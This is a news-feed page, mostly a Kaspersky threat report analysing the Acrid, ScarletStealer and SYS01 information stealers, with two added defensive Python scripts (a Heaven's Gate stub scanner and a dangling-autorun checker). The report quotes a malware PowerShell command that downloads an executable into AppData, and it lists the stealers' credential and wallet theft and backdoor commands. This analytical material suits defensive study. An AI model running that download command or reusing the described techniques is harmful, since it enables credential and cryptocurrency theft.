Intercontinental Exchange's Q1 revenue exceeded $1B – that'll sure teach 'em

The New York Stock Exchange's parent company has just been hit with a $10 million fine for failing to properly inform the Securities and Exchange Commission (SEC) of a 2021 cyber intrusion. …

Category: Viruses and Worms

Laundering cash from healthcare, romance scams lands US man in prison for a decade

The Register - Anti-Virus - 22 May 2024 - 20:00
$4.5M slushed through accounts from state healthcare and lonely people

Georgia resident Malachi Mullings received a decade-long sentence for laundering money scored in scams against healthcare providers, private companies, and individuals to the tune of $4.5 million.…

Category: Viruses and Worms

Confused by the SEC's IT security breach reporting rules? Read this

The Register - Anti-Virus - 22 May 2024 - 18:30
'Clarification' weighs in on material vs voluntary disclosures

The US Securities and Exchange Commission (SEC) wants to clarify guidelines for public companies regarding the disclosure of ransomware and other cybersecurity incidents.…

Category: Viruses and Worms

Stopping ransomware in multicloud environments

The Register - Anti-Virus - 22 May 2024 - 17:03
Attend this Register live event to learn how

Sponsored Survey and Live Event: What are the biggest risks to your organization posed by ransomware and what security defenses does it have in place to protect its sensitive data from cyber criminals?…

Category: Viruses and Worms

Stealers, stealers and more stealers

Kaspersky Securelist - 22 May 2024 - 12:00


Stealers are a prominent threat in the malware landscape. Over the past year we published our research into several stealers (see here, here and here), and for now, the trend seems to persist. In the past months, we wrote several private reports on stealers as we discovered Acrid (a new stealer), ScarletStealer (another new stealer) and Sys01, which had been updated quite a bit since the previous public analysis.

To learn more about our crimeware reporting service, you can contact us at [email protected].


Acrid is a new stealer found last December. Despite the name, it has nothing in common with the AcridRain stealer. Acrid is written in C++ for 32-bit systems, despite the fact that most systems are 64-bit these days. Upon closer inspection of the malware, the reason for compiling for a 32-bit environment became clear: the author decided to use the “Heaven’s Gate” technique. This allows 32-bit applications to access the 64-bit space to bypass certain security controls.

“Heaven’s Gate” technique implementation in Acrid stealer
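As an added illustration (not code from the Securelist report), the following Python scanner flags the byte patterns of the classic 32-bit Heaven's Gate stub, i.e. a far transfer to code segment selector 0x33, inside a PE32 image; the sample image, the pattern list and the function names are constructed here for the example.

```python
import re
import struct

# Byte patterns for the classic 32-bit "Heaven's Gate" stub: a far transfer to
# code segment selector 0x33, the 64-bit code segment used under WoW64.
HEAVENS_GATE_PATTERNS = {
    "push 0x33 / call $+5 / add [esp],5 / retf":
        rb"\x6A\x33\xE8\x00\x00\x00\x00\x83\x04\x24\x05\xCB",
    "push 0x33 / push imm32 / retf": rb"\x6A\x33\x68.{4}\xCB",
    "jmp far 0x33:imm32": rb"\xEA.{4}\x33\x00",
    "call far 0x33:imm32": rb"\x9A.{4}\x33\x00",
}


def is_pe32_i386(data: bytes) -> bool:
    """True if data looks like a PE whose COFF machine field is IMAGE_FILE_MACHINE_I386 (0x14C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False
    return struct.unpack_from("<H", data, e_lfanew + 4)[0] == 0x14C


def scan_heavens_gate(data: bytes):
    """Return (offset, description) for every candidate stub, sorted by offset.

    Byte matching over a whole file can hit data by chance, so confirm each
    hit by disassembling at the reported offset before drawing conclusions."""
    hits = []
    for desc, pat in HEAVENS_GATE_PATTERNS.items():
        for m in re.finditer(pat, data, re.DOTALL):
            hits.append((m.start(), desc))
    return sorted(hits)


def build_sample() -> bytes:
    """Constructed sample: a minimal PE32 header, NOP filler and one Heaven's Gate stub."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)            # e_lfanew -> PE signature
    coff = b"PE\0\0" + struct.pack("<H", 0x14C) + b"\0" * 18
    stub = bytes.fromhex("6A33E80000000083042405CB")        # push 0x33; call $+5; add [esp],5; retf
    return bytes(header) + coff + b"\x90" * 16 + stub + b"\xC3"


if __name__ == "__main__":
    sample = build_sample()
    print(is_pe32_i386(sample), scan_heavens_gate(sample))
```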

The malware implements the functionality one would typically expect from a stealer:

  • Stealing browser data (cookies, passwords, login data, credit card information, etc.);
  • Stealing local cryptocurrency wallets;
  • Stealing files with specific names (e.g. wallet.dat, password.docx, etc.);
  • Stealing credentials from installed applications (FTP managers, messengers, etc.).

Collected data is zipped and sent to the C2.

The malware is of medium sophistication. It has a certain degree of complexity, such as string encryption, but lacks any innovative features.


Last January, we analyzed a downloader we dubbed “Penguish”, which we described in detail in a private report. One of the payloads it downloaded was a previously unknown stealer we call “ScarletStealer”.

ScarletStealer is a rather odd stealer, as most of its stealing functionality is contained in other binaries (applications and Chrome extensions) that it downloads. To be more precise, when ScarletStealer is executed, it checks for the presence of cryptocurrency software and crypto wallets by looking for certain folder paths (e.g. %APPDATA%\Roaming\Exodus). If anything is detected, it starts downloading the additional executables using the following PowerShell command:

powershell.exe -Command "Invoke-WebRequest -Uri 'https://.........exe' -OutFile $env:APPDATA\.........exe"

Among the binaries it downloads are metaver_.exe (used to steal content from Chrome extensions), meta.exe (modifies the Chrome shortcut, so the browser is launched with a malicious extension), and others. Most of the ScarletStealer executables are digitally signed.

Metamask grabbing function

The stealer is very underdeveloped in terms of functionality and contains many errors, flaws and redundant code. For example, the malware tries to gain persistence on the system by creating a registry key for autorun. The registry key contains the path to the file Runtimebroker_.exe, but we did not find any code in any of the files involved in the infection that would store at least one executable file with that name.

It is therefore rather odd that this stealer is distributed through a long chain of downloaders, the last of which is the Penguish downloader, and is signed with a digital certificate. One would expect all this effort to result in a more advanced stealer than ScarletStealer.

ScarletStealer victims are mostly located in Brazil, Turkey, Indonesia, Algeria, Egypt, India, Vietnam, the USA, South Africa and Portugal.
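As an added triage check (not code from the report), the following Python flags autorun entries whose target executable does not exist on disk, the situation described above with Runtimebroker_.exe; the Run-key entries, the set of existing files and the function names are constructed for this example.

```python
import re

# Constructed Run-key entries modelled on the behaviour described above; the
# Runtimebroker_.exe entry mirrors the report, the other two are filler.
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Runtimebroker": r"C:\Users\alice\AppData\Roaming\Runtimebroker_.exe",
    "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
}

# Constructed view of which files exist on the host (compared case-insensitively);
# on a live system pass os.path.exists instead.
SAMPLE_EXISTING_FILES = {
    r"c:\users\alice\appdata\local\microsoft\onedrive\onedrive.exe",
    r"c:\windows\system32\securityhealthsystray.exe",
}

# First token of the command line: a quoted path, or everything up to the first space.
# An unquoted path containing spaces is mis-parsed; such entries need manual review.
_EXE_RE = re.compile(r'^\s*(?:"([^"]+)"|(\S+))')


def executable_of(command: str) -> str:
    """Extract the program path from an autorun command line."""
    m = _EXE_RE.match(command)
    return (m.group(1) or m.group(2)) if m else ""


def dangling_autoruns(run_values, exists):
    """Return names of Run-key values whose target executable is missing on disk."""
    return sorted(name for name, cmd in run_values.items()
                  if executable_of(cmd) and not exists(executable_of(cmd)))


def sample_exists(path: str) -> bool:
    return path.lower() in SAMPLE_EXISTING_FILES


def read_run_values():
    """Enumerate the current user's Run key on a live Windows host (unused offline)."""
    import winreg  # Windows-only, imported lazily so the constructed sample runs anywhere
    values, i = {}, 0
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                        r"Software\Microsoft\Windows\CurrentVersion\Run") as key:
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:          # no more values
                return values
            values[name] = str(data)
            i += 1


if __name__ == "__main__":
    print(dangling_autoruns(SAMPLE_RUN_VALUES, sample_exists))  # ['Runtimebroker']
```

A dangling autorun is not proof of infection on its own (uninstallers leave them too), but one pointing into %APPDATA% is worth correlating with recent PowerShell download activity.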


SYS01 (also known as “Album Stealer” or “S1deload Stealer”) is a relatively unknown stealer that has been around since at least 2022. It has been described by Bitdefender, Zscaler and Morphisec. In their reports, you can follow its evolution from a C# stealer to a PHP stealer. When we started looking into this campaign, we noticed a combination of the two: a C# and a PHP payload.

One thing that has not changed is the infection vector. Users are still tricked into downloading a malicious ZIP archive disguised as an adult video via a Facebook page:

Ad for the malicious ZIP archive on a compromised Facebook page

The archive contains a legitimate binary — in this case WdSyncservice.exe, renamed to PlayVideoFull.exe — that sideloads a malicious DLL named WDSync.dll. The DLL opens an adult-themed video and executes the next payload, which is a malicious PHP file encoded with ionCube.

The executed PHP file calls a script, install.bat, which ultimately runs the next stage by executing a PowerShell command. This layer is conveniently named runalayer and runs what seems to be the final payload called Newb.

There is, however, a difference between the latest version of the stealer and the previously disclosed versions: the functionality has been split. The stealer as it is now (Newb) contains functionality to steal Facebook-related data and to send stolen browser data, located and organized in a specific directory structure, to the C2. It also has backdoor functions and can execute the following commands, among others:

Command   Description
dll       Download a file, kill all the specified processes and start a new process using PowerShell (the command decrypts, unzips and executes the specified file). The PowerShell routine is similar to the routines observed earlier.
cmd       Kill a list of specified processes and start a new process.
dls       Download a file, kill all the specified processes and start a new specified process.

But the code that actually collects the browser data Newb sends to C2 was found in a different sample named imageclass. We were not able to determine with 100% certainty how imageclass was pushed to the system, but looking at the backdoor code of Newb, we concluded with a high degree of certainty that imageclass was later pushed through Newb to the infected machine.

The initial ZIP archive also contains another malicious PHP file: include.php. This file has similar backdoor functionality to Newb and accepts many of the same commands in the same format.

Victims of this campaign were found all over the world, but most of them were located in Algeria (a bit over 15%). This most likely has to do with the infection vector as it can be heavily localized. We also noticed that the malware authors have a preference for .top TLDs.


Stealers are a prominent threat that is here to stay. In this post, we have discussed an evolution of a known stealer, as well as two completely new stealers with different levels of complexity. The fact that new stealers appear every now and then, combined with the fact that their functionality and sophistication varies greatly, indicates that there is a criminal market demand for stealers.

The danger posed by stealers lies in the consequences. This malware steals passwords and other sensitive information, which can later be used for further malicious activities, causing great financial losses among other things. To protect yourself against stealers and other threats, it is essential to follow a number of basic hygiene rules. Always update your software with the latest security patches, don’t download any files from dubious sources, don’t open attachments in suspicious emails, etc. Finally, if you want to be even more sure, a security solution that looks at the behavior of events on your machine, such as our SystemWatcher component, can help protect your system as well.

If you would like to stay up to date on the latest TTPs being used by criminals, or if you have questions about our private reports, you can contact us at [email protected].

Indicators of compromise



